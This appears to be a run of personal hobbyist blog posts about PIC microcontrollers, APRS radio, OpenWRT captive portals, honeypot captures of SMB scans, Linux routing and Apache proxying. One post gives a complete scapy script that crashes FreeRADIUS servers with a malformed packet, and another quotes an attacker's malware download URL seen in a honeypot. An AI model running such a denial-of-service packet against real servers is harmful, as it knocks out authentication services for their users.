I’ve done something similar with an radio-controlled car in the past (very basic “go forward, turn, go forward, back up” stuff though), but that was 5+ years ago.  My goal this time is to code a program allowing the helicopter to lift-off, turn in search of the brightest source of light, and follow it. (Have you ever seen Sea-Monkeys go crazy over a flashlight? That’s my goal here, but with a helicopter)

A lot has changed in 5 years.  The last time I worked on a project like this (as basic as it really is), I was using a PIC IDE on Windows 2000 (something I’ve since misplaced). I was also using the PIC16f84A then, a chip that’s since become less than favorable (less memory, needs an external oscillator)

Having migrated entirely to the Linux operating system (aside from a dual-boot laptop for school), I went in search of a decent C compiler and simulator – and I really lucked out.  SDCC and GPSIM were exactly what I needed. (I have to give Micah Carrick a big thanks for his article that steered me in this direction)

My Desktop running GPSim and some test code

SDCC is simply a Small Device targetted C compiler, so I’m not going to go into in depth  here (see Micah’s great article above).  BUT I did have a major issue getting it set up initially:

The problem I experienced with SDCC was that the Gentoo Portage distributed version is 2.5.6 (as of March 2010).  Unfortunately, memory locations for individual pins on PORTA and PORTB on the PIC16f628A aren’t defined in the header files in 2.5.6. Usually, one can access them via RB[0-7], etc… So my advice is this – use the subversion distributed version of SDCC (which is presently 2.9.7)

My second issue getting set up  was with GPSIM. I’ve not had a chance to delve into the reasons, but for some unknown reason the version 0.23.0 and 0.24.0 wouldn’t play nice with any controller I tried:

gpsim -p16f627 -c testcode.stc

gpsim – the GNUPIC simulator
version: Release 0.23.0

type help for help
**gpsim> SimulationMode:51
FIXME gui_breadboard.cc Build
WARNING: command line processor named “16f627″ is being ignored
since the .cod file specifies the processor
WARNING: Ignoring the hex file “testcode.asm”
since the .cod file specifies the hex code
RRR gui_breadboard.cc:createLabel p16f627 11 42
Disabling WDT
FIXME: HLL files are not supported at the moment
**gpsim> running…
attempt write to invalid file register
address 0×10a, value 0×1
could not decode trace type: 0×0
0×0000000000000066 p16f627 0×00FC 0×008A movwf pclath
Read: 0×0001 from W
Invalid Trace entry: 0×0

After flailing around trying to make gpsim happy, I finally downgraded to 0.22.0, finding that I had no issues with it.

GPSIM has some nice features – stopwatch, available breakpoints,  simulated oscilloscope probes, the ability to lay out basic logic circuits, simulated LEDs and pushbuttons, etc

Simulated Scope Probes

Ok, so now I’m all set to develop. I’ll post videos of the helicopter before and after modifications, as well as a before and after test-flight shortly.

Yes, I’m well aware that APRS is not really meant as a vehicle tracking device, and in many circles it’s frowned upon.

I’ve enjoyed working with PIC microcontrollers since I was first introduced to the 16f84A years ago. But in all honestly, I’ve not done more than “blinky lights” and very basic modifications to an RC car with them. (Take a look at a great article to get started working with PICs)

Byonics has a cool kit – the Tiny Track3+. Figuring I’d use it as a chance to exercise my soldering skills (which need a bit of work), and liking the fact that I wouldn’t have to hunt for each individual component on my own, I picked one up (with GPS unit).

The project build steps are extremely well documented. Literally, every step along the way is fully explained along with color images in the downloadable PDF. Build time takes under 1 hour (actually closer to 30 minutes, although I incorrectly soldered the female DB9 connector to J2 and had to waste time de-soldering it).

Prior to installing the accompanying PIC16f628A chip, I made sure to back up the currently running software (these chips are dirt cheap, and I’m not entirely sure Byonics will just give me the software if I ever have to replace the chip) Looks like my old serial programmer still works (remember – the USB to serial adapters generally don’t put out enough voltage to program a chip, so make sure you have on-board serial):

Old serial PIC programmer

After backing up the code, I pop the chip into place on the TinyTracker, and voila -the finished product looks like this:

TinyTracker3+ Fully Assembled (I'm using Lysol in my coffee since I'm out of Half and Half)

The Byonics crew have also written software to configure the TinyTracker. Luckily it runs under WINE so I didn’t have to reboot. To configure, power the J1 DB9 connector with a 9volt battery.

TinyTracker3+ in it's case, being configured serially

And run the configuration program (again, it’s fairly well documented in the manual):

After being hung-up in customs (and a brutal snowstorm), I finally got the radio component of my APRS system – the FD-150A (It took almost a month to get here from Hong Kong)

The output voltage  on the FD-150 battery is ~6.25V, too low to power the TinyTracker3 (which requires 7+V). A voltage multiplier would probably fix that, but my overall goal is to encase all components in a NEMA style box, powering it off the car.  So for the rest of the testing period, I’m using an external power-supply.

Hopefully in the next few weeks, I’ll have time to finish the entire setup. Keep checking back, I’ll post updates when I can.

Quotaholic had also picked up a WebpadDt  with the hopes of expanding upon it’s capabilities. My initial goal was a cheap touchpad screen for a car-pc. Quotaholic was thinking about bigger possibilities – and built himself an entire community site.

So somewhere on or around March of 2009,   www.webdt.org was born.

While I don’t necessarily agree with some of the goals of the site (I personally don’t understand the point of testing to see which Linux distro’s will run on the webpad – and would like to see the community get behind one distro and build releases specifically aimed at the webpad)… the level of ambition is amazing.

I’ve not had much time to continue with the webpad on my own. Quotaholic however, has released a 100M version of Debian Lenny with the LXDE Desktop Environment geared towards the webpad (penmount drivers working and all)

So what am I doing with my DT now? Using it to stream audio (over my wireless) to my kitchen stereo. And the Gentoo Image that I’ve put a lot of work into? Well, that filesystem is on my storage server while I use Quotaholics release.

Happy Birthday webdt.org!!!

For the last 6 months or so, I’ve been running a free wireless access point for my neighborhood. In an effort to get my local community to know each other (and local goings-on), I’ve back-ended the system using the elgg social networking platform.

To use the free wifi, you have to register on the social site.

The Captive Portal

Uptime however has been a major pain – for quite some time NoCatSplash has been broken in DD-WRT. Ever since version 24 (at the very least), it’s been grouchy – all of the sudden not working and requiring a reboot (or possibly clearing and resetting the iptables targets and restarting splashd)  to fix. The wiki documents a few workarounds, but I’ve gotten tired of the overall bugs.

Initially I planned on simply fixing it, but after a little bit of thought,  I decided to give OpenWRT another look. I’m sure I could have gotten away with using the mini or micro versions of DD-WRT and adding to it, but last time I used OpenWRT’s build environment I was really impressed – so I spent this weekend working with it again.

Building your own image is simple – using the ImageBuilder system (I’m working with WRT-54G’s)  simply “make image” setting the target PROFILE and PACKAGES via environment variables. This method uses existing binary packages to build a .bin or .trx file for easy installation (via the web interface or mtd command). “make info” will give you a long list of profiles, and packages that are readily available are contained in the packages subdirectory.

Recompiling packages is extremely easy – download the SDK:

mkdir ~/devel && cd ~/devel

wget http://downloads.openwrt.org/kamikaze/8.09.2/brcm-2.4/OpenWrt-SDK-brcm-2.4-for-Linux-i686.tar.bz2

tar xjvpf OpenWrt-SDK-brcm-2.4-for-Linux-i686.tar.bz2

If the package already exists, check it out via subversion:

cd OpenWrt-SDK-brcm-2.4-for-Linux-i686

svn export svn://svn.openwrt.org/openwrt/packages/net/<packagename>  package/<packagename>

And to compile simply execute:

make package/<packagename>/compile V=99

(On older versions it’s “make package/<packagename>-compile V=99″)

After hitting my head against the nocatsplash package’s failure to build correctly, I finally opted to look at nodogsplash. “Because it will at least build” is probably not the best way to choose captive portal software, but it’s mine.

First thing requiring a fix is a bug that causes nodogsplash to crash when one sends a request to the auth-server without a “redir” GET variable being set – a bug evidenced by:

links “http://192.168.1.1:2050/nodogsplash_auth/?tok=fffffff”

Thankfully the crash is “gracefully” handled in safe.c’s safe_strdup()…. but it still causes the daemon to crash.

So – a quick patch, as well as some added “features” (including a magic token) and I’m set. Patches to source can be added to package/<packagename>/patches. Upon make, patches in this directory are first applied.

So instead of waiting around for a fix to NoCatSplash in DD-WRT, I’m moving on. So far NoDogSplash has proven effective – although I’m far from actually migrating to it (the old access point is still running for the time being). In the next few weeks I should have a custom web interface built, as well as pmacctd configured (I am exporting Netflow version 9 data to a collector as a C.Y.A measure), and bandwidth shaping properly enabled.

Custom patches to NoDogSplash are forthcoming.

Initially I was under the impression that the issue was isolated to the network I was on, although I’ve had confirmations from another non-related network (plus another host I have offnet) that :445 traffic is slightly higher than what is believed to be normal, but then again – what’s normal (without a good netflow collector and historical data, you probably have no idea)

A quick scan of the DSL routers I have access to, shows 314 unique IPs originating such scans to multiple destinations (this is one quick run of “show ip cache flow  | i  01BD” on each of 3 routers). I’m seeing the same thing on a VPS host I have located in Virginia.

Being a little more than curious, I’ve fired up nepenthes and within 8 minutes I had 3 SMB exploit attempts, where the affected machine tries to download “myreceve.com”

These exploits were hitting vulnerabilities on :139 (tcp), however, and I don’t believe are related (also they’re from the same class B network)

66.xx.xx.xx -> 66.xx.xx.xx ftp://1:1@66.xx.xx.xx:9015/myreceve.com

Connecting to this host in particular gives a warm welcome:

nc 66.xx.xx.xx 9015
220 fuckFtpd 0wns j0

Back to what prompted my initial interest – :445, I can’t seem to figure out whats really going on – packet captures indicate more than a normal SYN scan, but without some additional review, I have no idea why so many requests from so many hosts identical to this:

NetBIOS Session Service
Message Type: Session message
Length: 47
SMB (Server Message Block Protocol)
SMB Header
Server Component: SMB
SMB Command: Negotiate Protocol (0×72)
Error Class: Success (0×00)
Reserved: 00
Error Code: No Error
Flags: 0×00
Flags2: 0×0000
Process ID High: 0
Signature: 0000000000000000
Reserved: 0000
Tree ID: 0
Process ID: 604
User ID: 0
Multiplex ID: 0
Negotiate Protocol Request (0×72)
Word Count (WCT): 0
Byte Count (BCC): 12
Requested Dialects
Dialect: NT LM 0.12
Buffer Format: Dialect (2)
Name: NT LM 0.12

I’ve only slightly glanced over other SMB sessions, and this seems like a normal request… I’m a little baffled as to why every pcap I have from an apparently compromised host uses process id “604″, but otherwise each request appears valid.

So…. it’s probably nothing (usually is), but it definitely piqued my interest for a time today. Happy Thanksgiving!

Update at 22:25

At the advice of others, I’m installing dionaea, which apparently has better SMB support, to see if I can determine exactly what these connections are. I’ll post an update when I’m finished.

Update 06:00 11/25/2009

I’ve got dionea running and collecting bitstreams. Same basic signature (process id: 604), but now with a _lot_ more information in the captures (as dionaea is a little more fluent in the SMB protocol). Tonight: Cooking and reading pcaps.

My immediate suggestion was to grab an old Sun Cobalt Raq server. My former router was based off a Qube3 picked up off ebay for less than $80.00. The things are great: low power consumption, two NICs, an LCD screen, a trippy green LED panel….

Fear my awesome green LED

USB, Serial, and 2 ethers

There’s numerous walkthroughs on how to turn these things into mailservers, etc… (google for them). The basic gest of what one needs to do is:

• Upgrade the ROM. This has fixes for 2.6 kernels as well as support to boot from an ext3 filesystem.
• Install the root filesystem on the drive(s). This can be done by mounting the IDE drives in another box, or using an nfs server to install from the Qube itself.
• Compile a kernel. While there are many patches out there, I’ve found that (possibly aside from the LCD screen, which I’ve never bothered with), a vanilla 2.6 kernel will work fine

Nothing that’s too incredibly different from setting up a normal box. I would highly recommend two resources: The first of which is Braggtown, the second one being Tim and Tina Wileys site

As far as items to install: I’m personally using Quagga for static routing  and OSPF (I use the Cobalt as a route server. Also Quagga has a nice Cisco-like CLI), OpenSwan for VPN access, VTUN for quick tunnel here and there (over which I run OSPF), Roaring Penguin L2TP for various layer 2 tunnels, etc, etc..

Iproute2 provides for the ability to properly handle multiple WAN connections via multiple routing tables. There are 255 tables available for routing and  iproute2 makes the use of named tables easy – simply add the numeric value and tablename to /etc/iproute2/rt_tables.

When working with multiple WAN interfaces, I generally setup the second routing table and rules similar to this:

ip route add default via <gateway for this connection> dev <interface> table <tablename>

ip rule add from <WAN IP> table <tablename>

The above simply adds an interface into the table and adds a default gateway. To isolate a machine on the internal LAN to ONLY use the newly defined routing table, one can simply:

ip rule add from 192.168.32.10 table <tablename>

ip rule add to 192.168.32.10 table <tablename>

Depending on your default policy,  you may need to make alterations to your iptables rules as well (especially to support forwarding and NAT masquerading) You can also hook into TOS flags (amongst other things) and route based on port numbers, etc. Basically the sky is the limit (you can do round-robin routing out interfaces, etc)

Next up is IPv6. IPv6 tunnels are easy to come by these days – Hurricane Electric and Sixxs.net are two of the more popular tunnel-brokers, MyBSD is a Malaysian broker I would personally recommend (good for IRC, latency is high, it goes down semi-frequently.. but I like Malaysia).  Also be aware that some brokers block common IRC ports. (Luckily I’m currently testing IPv6 for the ISP I work for and am now working off our /32)

Quagga can handle IPv6 address auto-assignment on your LAN. By default, ipv6 nd suppress-ra is set on most all interfaces. Disable it on the LAN interface, slap an IPv6 address and subnet in that interface config – and voila – your IPv6 router is now handling IPv6 autoconfiguration.

I recently upgraded to using a small form-factor IBM ThinkCentre 8183B2U.

ThinkCenter with a Courier dialup modem and 3 USB drives atop it

The power consumption is also fairly low (I believe), and wanting to do a little more with the router, I figured why not spend another $80. Of course, the downside to the ThinkCentre is having only 1 on-board NIC and 2 PCI slots. In the near future I plan on picking up a quad-port LINKX ethernet card, to consolidate cards (I presently have 2 PCI NICs added to the router for connections to the LAN and a monitoring tap). Hopefully I can find a quad port card that will fit in the small form-factor .

And excuse the mess, I’ve yet to make things “pretty” yet.

First of all, the car is a 1999 Ford Taurus SE.. and as you can see in this dealer picture – it has all of the features of an aquatic animal – two bulbous eyes, two smaller “nostril” looking things, sideview mirrors that could possibly be fins, and a mouth where the ford emblem is.

The FISH! (Well, another Fish)

I’ve been working for a while on the possibility of using a WebpadDT as a touchscreen for a car pc. The inside of the Fish is huge – but at 8 inches or so, the WebpadDT takes up a lot of space. On the other hand, it’s quite a bit cheaper than a lilliput screen.

While driving home this weekend, I looked down and noticed an upcoming milestone:

111,108 miles

I got the camera ready – almost at 111,111 miles. Good Old Lucky 111,111 – make a wish!
Well… maybe not. Turns out 111,108 is an unlucky number:

My Brake Light is Out.

My brake light was apparently out. A quick notice from the cop, and I was on my way. Being only about a mile from my house meant I had to drive around the block a few times, but finally I hit it:

111,111 miles

RewriteRule ^/~(.*)$ http://user.proxiedto.net/~$1 [P]

Which works pretty well:

The problem is what happens when DirectorySlash is enabled on the proxied-to host  (which it is by default). DirectorySlash fixes incorrectly identified resources – as an example, if you request a directory but without the trailing forwardslash.

GET /~gillespiem/images HTTP/1.1
Host: www.proxy.net
…

In this instance, you get a 301 redirect that appends a “/” to the end of the request BUT also sets the Location header to  the proxied-to virtualhostname.  The Jig is up – and now the address bar in the browser indicates the real host the end-user is speaking to :

Here’s a snippet of response from the site:

HTTP/1.1 301 Moved Permanently
Date: Tue, 27 Oct 2009 16:28:27 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://user.proxiedto.net/~gillespiem/images/
…

I’ve not been able to find an easy way to change what DirectorySlash uses in the Location header (maybe you can’t). DirectorySlash is important, so simply not using it won’t work in this application. Instead, I opted to use a RewriteMap to simply write my own version:  DirectorySlashHack and enable it in the vhost container (on the proxy-to site) ala:

DirectorySlash off
RewriteMap directoryslashhack        prg:/etc/httpd/maps/directoryslashhack
RewriteRule ^/~([^/]+)(/?.*)         ${directoryslashhack:%1*$1*$2}

While the solution is hack-ish (and the script and rewriterule could use a small bit of cleanup), it seems to work so far. The perl script determines if the requested resource is a directory, and if so it issues the appropriate 301 redirect using a customizable location header (which allows me to force the cleaned-up request back to the proxy).

Earlier today, while reading through Full Disclosure, I came across something interesting: a Freeradius DoS bug. This piqued my interest as I’m currently experiencing _something_ that’s periodically knocking over radiusd. Furthermore, the radius server in question talks to a router with problematic L2TP tunnels (caused by a software bugs in L2TP sequencing on the Telco router on the other end…their vendor has confirmed the problems)

Time to create the packet of death. Scapy doesn’t appear to have a layer for RadiusAttributes yet, thankfully it IS in their Trac.

So, download the layer to scapy/layers, ensure that it imports the required items:

import struct
from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import UDP

from scapy.layers.radius import Radius

Add “radiuslib” to the load_layers array in config.py, and we’re ready to go:

#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11

import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr

if len(sys.argv) != 2:
print “Usage: radius_killer.py <radiushost>\n”
sys.exit(1)

PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
Radius(code=1,authenticator=”\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99″,id=180)/ \
RadiusAttr(type=69,value=”",len=2)

send(PoD)

(download)

Interestingly, one doesn’t need a shared key to send the packet of death, as you can tell the authenticator for the Access-Request packet is pulled out of thin air.

I’m assuming that most people iptable off access to their radius servers, so playing whack-a-mole with a provider probably isn’t that do-able. Beyond that, to even come close to possibly exploiting this, you need to be listed in clients.conf – so there’s already that level of trust.  Correct me if I’m wrong. Either way, updated packages are available.

After a friend opened my eyes to a few fun things one can do w/ a radio scanner, I went on a “learning tangent”, reading and talking to people w/ Amature licenses, digesting everything that one can do w/ a radio these days.

One of the things that’s interested me the most is APRS. Using Xastir, one can track mobile and static APRS stations in your area.

There’s some interesting stuff out there – in my area there’s a trucker (N6GVG) that I’ve followed, making runs from West Virginia, to Tennesse, to Pennsylvania, and from there to New Jersey. (I’m a HUGE fan of Open Transport Tycoon Deluxe, if you’ve not played it – seriously, get it. I only wish American trains were equiped w/ APRS)

The Extremely fun and addictive OTTD

I’d purchased a Yaesu-VX7R from ebay for just under $290.00.

With the amature license in tow (KB3TCN), I decided I’d start sending out my own beacons. Problem was, I couldn’t figure out how to interface my soundcard (I’m using soundmodem) with the Yaesu. I’d already purchased the CT-91 cable from ebay (it splits out from a 4 tipped 3.5mm plug to a 3.5mm headphone plug and 2.5mm mic input), but simply connecting the soundcard to the mic input (using an adapter) didn’t work (and was probably incredibly stupid to try). Doing so keeps the radio keyed, and I’m sure is bad.

After talking to the gang on freenode:#hamradio and looking at the manual for TNC connection, it turns out the solution is fairly simple – two interfaces utilizing various isolation transformers (see http://www.qsl.net/wm2u/interface.html for a good intro, I’ll post my modified schematics shortly… I actually wrote this post months ago)

The optimal voltage is 5mV with 2kohms of resistance. My circuit gets it pretty close (btw, I can’t take responsibility for any harm this circuit causes, use at your own discretion. Seriously, don’t trust my judgement – this is how I change a car tire).

Anyway, it’s working for me. I had to pump the soundcard output up pretty high, but I’ve got my beacon reportedly seen by others. (It’s been a few weeks since I’ve transmitted, as my next project is to do a PIC based tracker for my car)